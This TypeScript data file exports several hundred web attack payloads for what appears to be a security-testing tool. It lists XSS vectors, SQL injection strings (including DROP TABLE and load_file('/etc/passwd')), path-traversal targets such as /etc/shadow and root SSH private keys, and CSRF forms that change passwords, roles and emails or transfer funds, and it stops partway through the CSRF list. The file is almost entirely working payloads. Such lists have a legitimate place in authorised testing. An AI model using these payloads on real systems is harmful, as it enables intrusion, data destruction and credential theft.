export interface PayloadItem {
  id: number;
  category: 'XSS' | 'SQLi' | 'Traversal' | 'CSRF' | 'Command';
  value: string;
}

export const payloadsData: PayloadItem[] = [
  // --- XSS (Input Filter and Script Vectors - 100 items) ---
  { id: 1, category: 'XSS', value: "<script>alert(1)</script>" },
  { id: 2, category: 'XSS', value: "<img src=x onerror=alert(1)>" },
  { id: 3, category: 'XSS', value: "<svg/onload=alert(1)>" },
  { id: 4, category: 'XSS', value: "<body onload=alert(1)>" },
  { id: 5, category: 'XSS', value: "<iframe src=\"javascript:alert(1)\"></iframe>" },
  { id: 6, category: 'XSS', value: "<input autofocus onfocus=alert(1)>" },
  { id: 7, category: 'XSS', value: "<select autofocus onfocus=alert(1)>" },
  { id: 8, category: 'XSS', value: "<textarea autofocus onfocus=alert(1)>" },
  { id: 9, category: 'XSS', value: "<keygen autofocus onfocus=alert(1)>" },
  { id: 10, category: 'XSS', value: "<video><source onerror=alert(1)>" },
  { id: 11, category: 'XSS', value: "<audio src=x onerror=alert(1)>" },
  { id: 12, category: 'XSS', value: "<details open ontoggle=alert(1)>" },
  { id: 13, category: 'XSS', value: "\"><script>alert(1)</script>" },
  { id: 14, category: 'XSS', value: "'; alert(1); //" },
  { id: 15, category: 'XSS', value: "<script>eval(at5('YWxlcnQoMSk='))</script>" },
  { id: 16, category: 'XSS', value: "<img src=\"x:\" onerror=\"alert(1)\">" },
  { id: 17, category: 'XSS', value: "<img src=ognf onerror=alert(1)>" },
  { id: 18, category: 'XSS', value: "<svg onload=alert(1)>" },
  { id: 19, category: 'XSS', value: "<object data=\"javascript:alert(1)\">" },
  { id: 20, category: 'XSS', value: "<embed src=\"javascript:alert(1)\">" },
  { id: 21, category: 'XSS', value: "<marquee onstart=alert(1)>" },
  { id: 22, category: 'XSS', value: "<isindex action=\"javascript:alert(1)\">" },
  { id: 23, category: 'XSS', value: "<form action=\"javascript:alert(1)\"><input type=submit>" },
  { id: 24, category: 'XSS', value: "<button formaction=javascript:alert(1)>X</button>" },
  { id: 25, category: 'XSS', value: "<math><mtext><table><mglyph><style></style><img src=x onerror=alert(1)>" },
  { id: 26, category: 'XSS', value: "<a href=\"javascript:alert(1)\">Click</a>" },
  { id: 27, category: 'XSS', value: "<table background=\"javascript:alert(1)\">" },
  { id: 28, category: 'XSS', value: "<div style=\"background-image: url(javascript:alert(1))\">" },
  { id: 29, category: 'XSS', value: "<style>@import 'javascript:alert(1)';</style>" },
  { id: 30, category: 'XSS', value: "<meta http-equiv=\"refresh\" content=\"0;url=javascript:alert(1)\">" },
  { id: 31, category: 'XSS', value: "<link rel=\"import\" href=\"javascript:alert(1)\">" },
  { id: 32, category: 'XSS', value: "<script src=data:text/javascript,alert(1)></script>" },
  { id: 33, category: 'XSS', value: "<img src=x:alert(1) onerror=eval(src)>" },
  { id: 34, category: 'XSS', value: "<script>setTimeout('alert(1)', 0)</script>" },
  { id: 35, category: 'XSS', value: "<script>setInterval('alert(1)', 1000)</script>" },
  { id: 36, category: 'XSS', value: "<script>location='javascript:alert(1)'</script>" },
  { id: 37, category: 'XSS', value: "<script>top.location='javascript:alert(1)'</script>" },
  { id: 38, category: 'XSS', value: "<body onpageshow=alert(1)>" },
  { id: 39, category: 'XSS', value: "<body onfocus=alert(1)>" },
  { id: 40, category: 'XSS', value: "<body onscroll=alert(1)>" },
  { id: 41, category: 'XSS', value: "<div onpointerover=alert(1)>Hover</div>" },
  { id: 42, category: 'XSS', value: "<svg><animate onrepeat=alert(1)>" },
  { id: 43, category: 'XSS', value: "<svg><set attributeName=onmouseover to=alert(1)>" },
  { id: 44, category: 'XSS', value: "<input type=\"image\" src=x onerror=alert(1)>" },
  { id: 45, category: 'XSS', value: "<index onmouseover=alert(1)>" },
  { id: 46, category: 'XSS', value: "<image src=x onerror=alert(1)>" },
  { id: 47, category: 'XSS', value: "<object type=\"image/svg+xml\" data=\"data:image/svg+xml,<svg onload=alert(1)>\">" },
  { id: 48, category: 'XSS', value: "<iframe srcdoc=\"<script>alert(1)</script>\"></iframe>" },
  { id: 49, category: 'XSS', value: "<svg><handler xmlns:ev=\"http://www.w3.org/2001/xml-events\" ev:event=load>alert(1)</handler></svg>" },
  { id: 50, category: 'XSS', value: "<xml id=x><i xmlns=\"http://www.w3.org/1999/xhtml\"><script>alert(1)</script></i></xml><transform xmlns=\"http://www.w3.org/1999/XSL/Transform\" version=\"1.0\"><template match=\"/\"><value-of select=\"document(@id)\"/></template></transform>" },
  { id: 51, category: 'XSS', value: "'><script>alert(1)</script>" },
  { id: 52, category: 'XSS', value: "\"><img src=x onerror=alert(1)>" },
  { id: 53, category: 'XSS', value: "';confirm(1)//" },
  { id: 54, category: 'XSS', value: "\";confirm(1)//" },
  { id: 55, category: 'XSS', value: "<script>prompt(1)</script>" },
  { id: 56, category: 'XSS', value: "<svg onload=prompt(1)>" },
  { id: 57, category: 'XSS', value: "<body onload=prompt(1)>" },
  { id: 58, category: 'XSS', value: "<img src=x onerror=prompt(1)>" },
  { id: 59, category: 'XSS', value: "<iframe src=\"javascript:prompt(1)\">" },
  { id: 60, category: 'XSS', value: "<math><mtext><table><mglyph><style>@import'//attacker.com/xss.css';</style>" },
  { id: 61, category: 'XSS', value: "<script/src=data:;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==></script>" },
  { id: 62, category: 'XSS', value: "<body onresize=alert(1)>" },
  { id: 63, category: 'XSS', value: "<body onunload=alert(1)>" },
  { id: 64, category: 'XSS', value: "<svg><animatetransform attributeName=transform begin=0s dur=1s type=translate from=0 to=0 onend=alert(1)>" },
  { id: 65, category: 'XSS', value: "<input type=text value=\"\" autofocus onfocus=alert(1)>" },
  { id: 66, category: 'XSS', value: "<input type=password autofocus onfocus=alert(1)>" },
  { id: 67, category: 'XSS', value: "<input type=checkbox autofocus onfocus=alert(1)>" },
  { id: 68, category: 'XSS', value: "<input type=radio autofocus onfocus=alert(1)>" },
  { id: 69, category: 'XSS', value: "<input type=file autofocus onfocus=alert(1)>" },
  { id: 70, category: 'XSS', value: "<input type=range autofocus onfocus=alert(1)>" },
  { id: 71, category: 'XSS', value: "<input type=color autofocus onfocus=alert(1)>" },
  { id: 72, category: 'XSS', value: "<input type=date autofocus onfocus=alert(1)>" },
  { id: 73, category: 'XSS', value: "<input type=month autofocus onfocus=alert(1)>" },
  { id: 74, category: 'XSS', value: "<input type=week autofocus onfocus=alert(1)>" },
  { id: 75, category: 'XSS', value: "<input type=time autofocus onfocus=alert(1)>" },
  { id: 76, category: 'XSS', value: "<input type=datetime-local autofocus onfocus=alert(1)>" },
  { id: 77, category: 'XSS', value: "<input type=number autofocus onfocus=alert(1)>" },
  { id: 78, category: 'XSS', value: "<input type=email autofocus onfocus=alert(1)>" },
  { id: 79, category: 'XSS', value: "<input type=url autofocus onfocus=alert(1)>" },
  { id: 80, category: 'XSS', value: "<input type=search autofocus onfocus=alert(1)>" },
  { id: 81, category: 'XSS', value: "<input type=tel autofocus onfocus=alert(1)>" },
  { id: 82, category: 'XSS', value: "<input type=submit autofocus onfocus=alert(1)>" },
  { id: 83, category: 'XSS', value: "<input type=image autofocus onfocus=alert(1)>" },
  { id: 84, category: 'XSS', value: "<input type=reset autofocus onfocus=alert(1)>" },
  { id: 85, category: 'XSS', value: "<input type=button autofocus onfocus=alert(1)>" },
  { id: 86, category: 'XSS', value: "<select autofocus onfocus=alert(1)><option>1</option></select>" },
  { id: 87, category: 'XSS', value: "<textarea autofocus onfocus=alert(1)></textarea>" },
  { id: 88, category: 'XSS', value: "<keygen autofocus onfocus=alert(1)>" },
  { id: 89, category: 'XSS', value: "<frameset onload=alert(1)>" },
  { id: 90, category: 'XSS', value: "<video src=x onerror=alert(1)></video>" },
  { id: 91, category: 'XSS', value: "<audio src=x onerror=alert(1)></audio>" },
  { id: 92, category: 'XSS', value: "<object data=\"data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==\"></object>" },
  { id: 93, category: 'XSS', value: "<svg><script>alert(1)</script></svg>" },
  { id: 94, category: 'XSS', value: "<svg><script xlink:href=\"data:text/javascript,alert(1)\"/></svg>" },
  { id: 95, category: 'XSS', value: "<math href=\"javascript:alert(1)\">CLICKME</math>" },
  { id: 96, category: 'XSS', value: "<p oncut=alert(1)>Cut me</p>" },
  { id: 97, category: 'XSS', value: "<p oncopy=alert(1)>Copy me</p>" },
  { id: 98, category: 'XSS', value: "<p onpaste=alert(1)>Paste me</p>" },
  { id: 99, category: 'XSS', value: "<div draggable=\"true\" ondrag=alert(1)>Drag me</div>" },
  { id: 100, category: 'XSS', value: "<form onsubmit=alert(1)><input type=submit></form>" },

  // --- SQLi (Database Query Injections - 100 items) ---
  { id: 101, category: 'SQLi', value: "' OR '1'='1" },
  { id: 102, category: 'SQLi', value: "' OR 1=1--" },
  { id: 103, category: 'SQLi', value: "admin' --" },
  { id: 104, category: 'SQLi', value: "admin' # " },
  { id: 105, category: 'SQLi', value: "' UNION SELECT NULL, NULL, NULL--" },
  { id: 106, category: 'SQLi', value: "1' ORDER BY 1--" },
  { id: 107, category: 'SQLi', value: "1' ORDER BY 10--" },
  { id: 108, category: 'SQLi', value: "'; DROP TABLE users; --" },
  { id: 109, category: 'SQLi', value: "' OR '1'='1' /*" },
  { id: 110, category: 'SQLi', value: "1 OR 1=1" },
  { id: 111, category: 'SQLi', value: "admin' OR 1=1-- -" },
  { id: 112, category: 'SQLi', value: "' OR 'a'='a" },
  { id: 113, category: 'SQLi', value: "') OR ('1'='1" },
  { id: 114, category: 'SQLi', value: "\") OR (\"1\"=\"1" },
  { id: 115, category: 'SQLi', value: "' OR 1=1 LIMIT 1 --" },
  { id: 116, category: 'SQLi', value: "admin')-- -" },
  { id: 117, category: 'SQLi', value: "admin') /*" },
  { id: 118, category: 'SQLi', value: "' UNION SELECT 1, 2, 3--" },
  { id: 119, category: 'SQLi', value: "' UNION ALL SELECT 1, 2, 3--" },
  { id: 120, category: 'SQLi', value: "') UNION SELECT NULL, NULL--" },
  { id: 121, category: 'SQLi', value: "1' AND 1=1--" },
  { id: 122, category: 'SQLi', value: "1' AND 1=2--" },
  { id: 123, category: 'SQLi', value: "1' AND SLEEP(5)--" },
  { id: 124, category: 'SQLi', value: "1' AND BENCHMARK(10000000,MD5(1))--" },
  { id: 125, category: 'SQLi', value: "1' AND (SELECT * FROM (SELECT(SLEEP(5)))a)--" },
  { id: 126, category: 'SQLi', value: "1' WAITFOR DELAY '0:0:5'--" },
  { id: 127, category: 'SQLi', value: "1' OR IF(1=1, SLEEP(5), 0)--" },
  { id: 128, category: 'SQLi', value: "1' UNION SELECT @@version--" },
  { id: 129, category: 'SQLi', value: "1' UNION SELECT user()--" },
  { id: 130, category: 'SQLi', value: "1' UNION SELECT database()--" },
  { id: 131, category: 'SQLi', value: "admin' AND LENGTH(password)>=1 --" },
  { id: 132, category: 'SQLi', value: "admin' AND SUBSTRING(password,1,1)='a' --" },
  { id: 133, category: 'SQLi', value: "1' AND EXTRACTVALUE(1, CONCAT(0x7e, @@version))--" },
  { id: 134, category: 'SQLi', value: "1' AND UPDATEXML(1, CONCAT(0x7e, @@version), 1)--" },
  { id: 135, category: 'SQLi', value: "1' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT(version(),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)--" },
  { id: 136, category: 'SQLi', value: "1' UNION SELECT table_name FROM information_schema.tables--" },
  { id: 137, category: 'SQLi', value: "1' UNION SELECT column_name FROM information_schema.columns WHERE table_name='users'--" },
  { id: 138, category: 'SQLi', value: "1' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)--" },
  { id: 139, category: 'SQLi', value: "1'; WAITFOR DELAY '0:0:5'--" },
  { id: 140, category: 'SQLi', value: "1' UNION SELECT NULL, table_name FROM information_schema.tables--" },
  { id: 141, category: 'SQLi', value: "1' UNION SELECT NULL, column_name FROM information_schema.columns--" },
  { id: 142, category: 'SQLi', value: "'-' '1" },
  { id: 143, category: 'SQLi', value: "'||(SELECT '' FROM DUAL)--" },
  { id: 144, category: 'SQLi', value: "' AND 1=0 UNION ALL SELECT table_name FROM user_tables--" },
  { id: 145, category: 'SQLi', value: "1' AND 1=0 UNION ALL SELECT column_name FROM user_tab_columns--" },
  { id: 146, category: 'SQLi', value: "' OR 1=1 GROUP BY 1--" },
  { id: 147, category: 'SQLi', value: "' OR 1=1 HAVING 1=1--" },
  { id: 148, category: 'SQLi', value: "admin') OR ('1'='1" },
  { id: 149, category: 'SQLi', value: "admin' OR '1'='1' LIMIT 1;-- " },
  { id: 150, category: 'SQLi', value: "1' HAVING 1=1--" },
  { id: 151, category: 'SQLi', value: "1' GROUP BY concat(version(),floor(rand(0)*2)) HAVING min(0)--" },
  { id: 152, category: 'SQLi', value: "') OR 1=1--" },
  { id: 153, category: 'SQLi', value: "\") OR 1=1--" },
  { id: 154, category: 'SQLi', value: "' OR true--" },
  { id: 155, category: 'SQLi', value: "\" OR true--" },
  { id: 156, category: 'SQLi', value: "1' OR '1'='1' -- -" },
  { id: 157, category: 'SQLi', value: "1' OR '1'='1' /*" },
  { id: 158, category: 'SQLi', value: "1' OR '1'='1' (#" },
  { id: 159, category: 'SQLi', value: "1' OR '1'='1' OR '" },
  { id: 160, category: 'SQLi', value: "admin' OR '1'='1'/*" },
  { id: 161, category: 'SQLi', value: "admin' OR '1'='1'--+" },
  { id: 162, category: 'SQLi', value: "admin' OR '1'='1'-- " },
  { id: 163, category: 'SQLi', value: "admin' OR '1'='1'#" },
  { id: 164, category: 'SQLi', value: "admin' OR '1'='1';--" },
  { id: 165, category: 'SQLi', value: "admin' OR '1'='1';# " },
  { id: 166, category: 'SQLi', value: "admin' OR 1=1# " },
  { id: 167, category: 'SQLi', value: "admin' OR 1=1--" },
  { id: 168, category: 'SQLi', value: "admin' OR 1=1/*" },
  { id: 169, category: 'SQLi', value: "' OR id=1--" },
  { id: 170, category: 'SQLi', value: "' OR id=1/*" },
  { id: 171, category: 'SQLi', value: "' OR id=1# " },
  { id: 172, category: 'SQLi', value: "admin' -- -" },
  { id: 173, category: 'SQLi', value: "admin' # " },
  { id: 174, category: 'SQLi', value: "admin'/*" },
  { id: 175, category: 'SQLi', value: "' OR 'x'='x" },
  { id: 176, category: 'SQLi', value: "\" OR \"x\"=\"x" },
  { id: 177, category: 'SQLi', value: "' OR 1=1 LIMIT 1--" },
  { id: 178, category: 'SQLi', value: "') OR ('x'='x" },
  { id: 179, category: 'SQLi', value: "\") OR (\"x\"=\"x" },
  { id: 180, category: 'SQLi', value: "' OR 1=1 LIMIT 1 OFFSET 0--" },
  { id: 181, category: 'SQLi', value: "' UNION SELECT NULL-- " },
  { id: 182, category: 'SQLi', value: "' UNION SELECT NULL,NULL-- " },
  { id: 183, category: 'SQLi', value: "' UNION SELECT NULL,NULL,NULL-- " },
  { id: 184, category: 'SQLi', value: "' UNION SELECT NULL,NULL,NULL,NULL-- " },
  { id: 185, category: 'SQLi', value: "' UNION SELECT NULL,NULL,NULL,NULL,NULL-- " },
  { id: 186, category: 'SQLi', value: "1' UNION ALL SELECT NULL,NULL,NULL--" },
  { id: 187, category: 'SQLi', value: "1' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT version()),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)--" },
  { id: 188, category: 'SQLi', value: "1' UNION SELECT SUM(table_rows) FROM information_schema.tables WHERE table_schema=database()--" },
  { id: 189, category: 'SQLi', value: "1' UNION SELECT schema_name FROM information_schema.schemata--" },
  { id: 190, category: 'SQLi', value: "1' UNION SELECT grantee FROM information_schema.user_privileges--" },
  { id: 191, category: 'SQLi', value: "1' UNION SELECT host FROM mysql.user--" },
  { id: 192, category: 'SQLi', value: "1' AND ASCII(SUBSTRING((SELECT database()),1,1))=116--" },
  { id: 193, category: 'SQLi', value: "1' AND ORD(MID((SELECT IFNULL(CAST(@@version AS NCHAR),0x20)),1,1))>0--" },
  { id: 194, category: 'SQLi', value: "1' UNION SELECT load_file('/etc/passwd')--" },
  { id: 195, category: 'SQLi', value: "1' UNION SELECT @@version, user(), database()--" },
  { id: 196, category: 'SQLi', value: "1' UNION SELECT NULL, table_name FROM information_schema.tables--" },
  { id: 197, category: 'SQLi', value: "1' AND 1=2 UNION SELECT 1, 2, 3--" },
  { id: 198, category: 'SQLi', value: "1' AND (SELECT * FROM (SELECT(SLEEP(10)))b)--" },
  { id: 199, category: 'SQLi', value: "1' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--" },
  { id: 200, category: 'SQLi', value: "1' UNION SELECT 1,2,3,4,5,6,7,8,9,10--" },

  // --- Traversal (File Path & Directory Traversal - 100 items) ---
  { id: 201, category: 'Traversal', value: "../../../../etc/passwd" },
  { id: 202, category: 'Traversal', value: "..\\..\\..\\..\\windows\\win.ini" },
  { id: 203, category: 'Traversal', value: "%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd" },
  { id: 204, category: 'Traversal', value: "..%2f..%2f..%2f..%2fetc%2fpasswd" },
  { id: 205, category: 'Traversal', value: "..%2f..%2f..%2f..%2fwindows%2fwin.ini" },
  { id: 206, category: 'Traversal', value: "..\\..\\..\\..\\windows\\system.ini" },
  { id: 207, category: 'Traversal', value: "/etc/passwd" },
  { id: 208, category: 'Traversal', value: "/etc/shadow" },
  { id: 209, category: 'Traversal', value: "/etc/hosts" },
  { id: 210, category: 'Traversal', value: "/etc/issue" },
  { id: 211, category: 'Traversal', value: "/proc/version" },
  { id: 212, category: 'Traversal', value: "/proc/self/environ" },
  { id: 213, category: 'Traversal', value: "/proc/self/cmdline" },
  { id: 214, category: 'Traversal', value: "C:\\boot.ini" },
  { id: 215, category: 'Traversal', value: "C:\\windows\\win.ini" },
  { id: 216, category: 'Traversal', value: "C:\\windows\\system32\\drivers\\etc\\hosts" },
  { id: 217, category: 'Traversal', value: "..%252e%252e%252fetc%252fpasswd" },
  { id: 218, category: 'Traversal', value: "..\\..\\..\\..\\..\\..\\..\\..\\..\\etc\\passwd" },
  { id: 219, category: 'Traversal', value: "..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini" },
  { id: 220, category: 'Traversal', value: "....//....//....//etc/passwd" },
  { id: 221, category: 'Traversal', value: "....\\\\....\\\\....\\\\windows\\win.ini" },
  { id: 222, category: 'Traversal', value: "..././..././..././etc/passwd" },
  { id: 223, category: 'Traversal', value: "/var/log/apache2/access.log" },
  { id: 224, category: 'Traversal', value: "/var/log/nginx/access.log" },
  { id: 225, category: 'Traversal', value: "/var/log/auth.log" },
  { id: 226, category: 'Traversal', value: "..%c0%af..%c0%af..%c0%afetc/passwd" },
  { id: 227, category: 'Traversal', value: "..%ef%be%96..%ef%be%96..%ef%be%96etc/passwd" },
  { id: 228, category: 'Traversal', value: "%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd" },
  { id: 229, category: 'Traversal', value: "..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\etc\\passwd" },
  { id: 230, category: 'Traversal', value: "..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini" },
  { id: 231, category: 'Traversal', value: "file:///etc/passwd" },
  { id: 232, category: 'Traversal', value: "file:///c:/windows/win.ini" },
  { id: 233, category: 'Traversal', value: "..\\..\tnsnames.ora" },
  { id: 234, category: 'Traversal', value: "/etc/group" },
  { id: 235, category: 'Traversal', value: "/etc/resolv.conf" },
  { id: 236, category: 'Traversal', value: "/etc/network/interfaces" },
  { id: 237, category: 'Traversal', value: "/var/mail/root" },
  { id: 238, category: 'Traversal', value: "/root/.bash_history" },
  { id: 239, category: 'Traversal', value: "/home/user/.bash_history" },
  { id: 240, category: 'Traversal', value: "/etc/fstab" },
  { id: 241, category: 'Traversal', value: "..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd" },
  { id: 242, category: 'Traversal', value: "..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\boot.ini" },
  { id: 243, category: 'Traversal', value: "C:/windows/system32/cmd.exe" },
  { id: 244, category: 'Traversal', value: "/bin/sh" },
  { id: 245, category: 'Traversal', value: "/bin/bash" },
  { id: 246, category: 'Traversal', value: "index.php%00.jpg" },
  { id: 247, category: 'Traversal', value: "config.php~" },
  { id: 248, category: 'Traversal', value: ".env" },
  { id: 249, category: 'Traversal', value: "WEB-INF/web.xml" },
  { id: 250, category: 'Traversal', value: "META-INF/MANIFEST.MF" },
  { id: 251, category: 'Traversal', value: "../../../../../../../../../../../etc/passwd%00" },
  { id: 252, category: 'Traversal', value: "..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini" },
  { id: 253, category: 'Traversal', value: "/proc/cpuinfo" },
  { id: 254, category: 'Traversal', value: "/proc/meminfo" },
  { id: 255, category: 'Traversal', value: "/proc/modules" },
  { id: 256, category: 'Traversal', value: "/proc/net/tcp" },
  { id: 257, category: 'Traversal', value: "/proc/net/arp" },
  { id: 258, category: 'Traversal', value: "/proc/self/fd/0" },
  { id: 259, category: 'Traversal', value: "/proc/self/fd/1" },
  { id: 260, category: 'Traversal', value: "/proc/self/fd/2" },
  { id: 261, category: 'Traversal', value: "..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\etc\\passwd" },
  { id: 262, category: 'Traversal', value: "..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd" },
  { id: 263, category: 'Traversal', value: "%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd" },
  { id: 264, category: 'Traversal', value: "..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\etc\\passwd" },
  { id: 265, category: 'Traversal', value: "C:\\inetpub\\wwwroot\\global.asa" },
  { id: 266, category: 'Traversal', value: "C:\\inetpub\\logs\\LogFiles\\W3SVC1\\ex*.log" },
  { id: 267, category: 'Traversal', value: "/etc/apache2/apache2.conf" },
  { id: 268, category: 'Traversal', value: "/etc/nginx/nginx.conf" },
  { id: 269, category: 'Traversal', value: "/usr/local/apache2/conf/httpd.conf" },
  { id: 270, category: 'Traversal', value: "/opt/lampp/etc/httpd.conf" },
  { id: 271, category: 'Traversal', value: "/etc/mysql/my.cnf" },
  { id: 272, category: 'Traversal', value: "/etc/php/php.ini" },
  { id: 273, category: 'Traversal', value: "/usr/local/lib/php.ini" },
  { id: 274, category: 'Traversal', value: "..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\etc\\passwd" },
  { id: 275, category: 'Traversal', value: "..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd" },
  { id: 276, category: 'Traversal', value: "..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\etc\\passwd" },
  { id: 277, category: 'Traversal', value: "..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc\\passwd" },
  { id: 278, category: 'Traversal', value: "..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows\\win.ini" },
  { id: 279, category: 'Traversal', value: "..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\etc\\passwd" },
  { id: 280, category: 'Traversal', value: "....//....//....//....//....//etc/passwd" },
  { id: 281, category: 'Traversal', value: "....\\\\....\\\\....\\\\....\\\\....\\\\windows\\win.ini" },
  { id: 282, category: 'Traversal', value: "/etc/crontab" },
  { id: 283, category: 'Traversal', value: "/etc/sudoers" },
  { id: 284, category: 'Traversal', value: "/etc/ssh/sshd_config" },
  { id: 285, category: 'Traversal', value: "/var/lib/mlocate/mlocate.db" },
  { id: 286, category: 'Traversal', value: "/var/lib/locate.db" },
  { id: 287, category: 'Traversal', value: "/root/.ssh/id_rsa" },
  { id: 288, category: 'Traversal', value: "/root/.ssh/authorized_keys" },
  { id: 289, category: 'Traversal', value: "/home/user/.ssh/id_rsa" },
  { id: 290, category: 'Traversal', value: "/home/user/.ssh/authorized_keys" },
  { id: 291, category: 'Traversal', value: "..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\etc\\passwd" },
  { id: 292, category: 'Traversal', value: "..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd" },
  { id: 293, category: 'Traversal', value: "..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\etc\\passwd" },
  { id: 294, category: 'Traversal', value: "C:\\Program Files\\Apache Group\\Apache\\logs\\access.log" },
  { id: 295, category: 'Traversal', value: "C:\\xampp\\apache\\logs\\access.log" },
  { id: 296, category: 'Traversal', value: "C:\\wamp\\logs\\apache_error.log" },
  { id: 297, category: 'Traversal', value: "/etc/security/limits.conf" },
  { id: 298, category: 'Traversal', value: "/etc/pam.d/common-auth" },
  { id: 299, category: 'Traversal', value: "/etc/aliases" },
  { id: 300, category: 'Traversal', value: "/etc/anacrontab" },

  // --- CSRF (Session Security & Validation Vectors - 100 items) ---
  { id: 301, category: 'CSRF', value: "<img src=\"http://target.com/admin/delete?id=1\" width=\"0\" height=\"0\" />" },
  { id: 302, category: 'CSRF', value: "<form action=\"http://target.com/updateProfile\" method=\"POST\" id=\"csrfForm\"><input type=\"hidden\" name=\"email\" value=\"tester@example.com\" /></form><script>document.getElementById('csrfForm').submit();</script>" },
  { id: 303, category: 'CSRF', value: "<iframe src=\"http://target.com/transfer?amount=1000&to=audit\" style=\"display:none;\"></iframe>" },
  { id: 304, category: 'CSRF', value: "<body onload=\"document.forms[0].submit()\">" },
  { id: 305, category: 'CSRF', value: "<script>fetch('http://target.com/api/set-role', {method: 'POST', credentials: 'include', body: JSON.stringify({role: 'admin'})})</script>" },
  { id: 306, category: 'CSRF', value: "<link rel=\"stylesheet\" href=\"http://target.com/logout\" />" },
  { id: 307, category: 'CSRF', value: "<video src=\"http://target.com/deleteAccount\" autoplay></video>" },
  { id: 308, category: 'CSRF', value: "<audio src=\"http://target.com/resetPassword\" autoplay></audio>" },
  { id: 309, category: 'CSRF', value: "<object data=\"http://target.com/changePassword?new=123456\"></object>" },
  { id: 310, category: 'CSRF', value: "<script>navigator.sendBeacon('http://target.com/logoff', 'data');</script>" },
  { id: 311, category: 'CSRF', value: "<form action=\"http://target.com/settings\" method=\"POST\"><input type=\"hidden\" name=\"theme\" value=\"dark\"/></form>" },
  { id: 312, category: 'CSRF', value: "<img src=\"http://target.com/api/v1/user/delete?confirm=true\" />" },
  { id: 313, category: 'CSRF', value: "<script>var xhr = new XMLHttpRequest(); xhr.open('GET', 'http://target.com/action', true); xhr.withCredentials = true; xhr.send();</script>" },
  { id: 314, category: 'CSRF', value: "<div style=\"background:url('http://target.com/track?click=1')\"></div>" },
  { id: 315, category: 'CSRF', value: "<meta http-equiv=\"refresh\" content=\"0;url=http://target.com/api/trigger\" />" },
  { id: 316, category: 'CSRF', value: "<form id=\"pwn\" action=\"http://target.com/change-email\" method=\"POST\"><input name=\"email\" value=\"audit@example.com\"></form><script>document.getElementById('pwn').submit();</script>" },
  { id: 317, category: 'CSRF', value: "<button onclick=\"location.href='http://target.com/pay?to=audit'\">Click Me</button>" },
  { id: 318, category: 'CSRF', value: "<svg onload=\"fetch('http://target.com/api/buy?item=1')\"></svg>" },
  { id: 319, category: 'CSRF', value: "<input type=\"hidden\" name=\"_method\" value=\"PUT\" />" },
  { id: 320, category: 'CSRF', value: "<script>setTimeout(() => { location.href = 'http://target.com/logout'; }, 1000);</script>" },
  { id: 321, category: 'CSRF', value: "<form action=\"http://target.com/posts/new\" method=\"POST\"><input name=\"title\" value=\"Audit\"></form>" },
  { id: 322, category: 'CSRF', value: "<img src=\"http://target.com/api/like?id=50\" />" },
  { id: 323, category: 'CSRF', value: "<script>new Image().src = 'http://target.com/trigger';</script>" },
  { id: 324, category: 'CSRF', value: "<iframe srcdoc=\"<form action='http://target.com/transfer' method='POST' id='f'><input name='amt' value='999'></form><script>f.submit()</script>\"></iframe>" },
  { id: 325, category: 'CSRF', value: "<form action=\"http://target.com/subscribe\" method=\"POST\" name=\"sub\"><input type=\"hidden\" name=\"plan\" value=\"premium\"></form><script>document.sub.submit();</script>" },
  { id: 326, category: 'CSRF', value: "<script>navigator.sendBeacon('http://target.com/api/analytics', 'audit_probe=1');</script>" },
  { id: 327, category: 'CSRF', value: "<object type=\"image/svg+xml\" data=\"http://target.com/action.svg\"></object>" },
  { id: 328, category: 'CSRF', value: "<embed src=\"http://target.com/action.swf\" />" },
  { id: 329, category: 'CSRF', value: "<body onpageshow=\"fetch('http://target.com/ping')\">" },
  { id: 330, category: 'CSRF', value: "<form action=\"http://target.com/api/vote\" method=\"POST\"><input name=\"vote\" value=\"yes\"></form>" },
  { id: 331, category: 'CSRF', value: "<form action=\"http://target.com/api/comment\" method=\"POST\"><input name=\"body\" value=\"Test Comment\"></form>" },
  { id: 332, category: 'CSRF', value: "<form action=\"http://target.com/api/change-password\" method=\"POST\"><input type=\"password\" name=\"password\" value=\"TestPass123!\"></form>" },
  { id: 333, category: 'CSRF', value: "<script>fetch('http://target.com/api/notifications/clear', {method: 'POST', credentials: 'include'})</script>" },
  { id: 334, category: 'CSRF', value: "<link rel=\"prefetch\" href=\"http://target.com/api/action?execute=1\" />" },
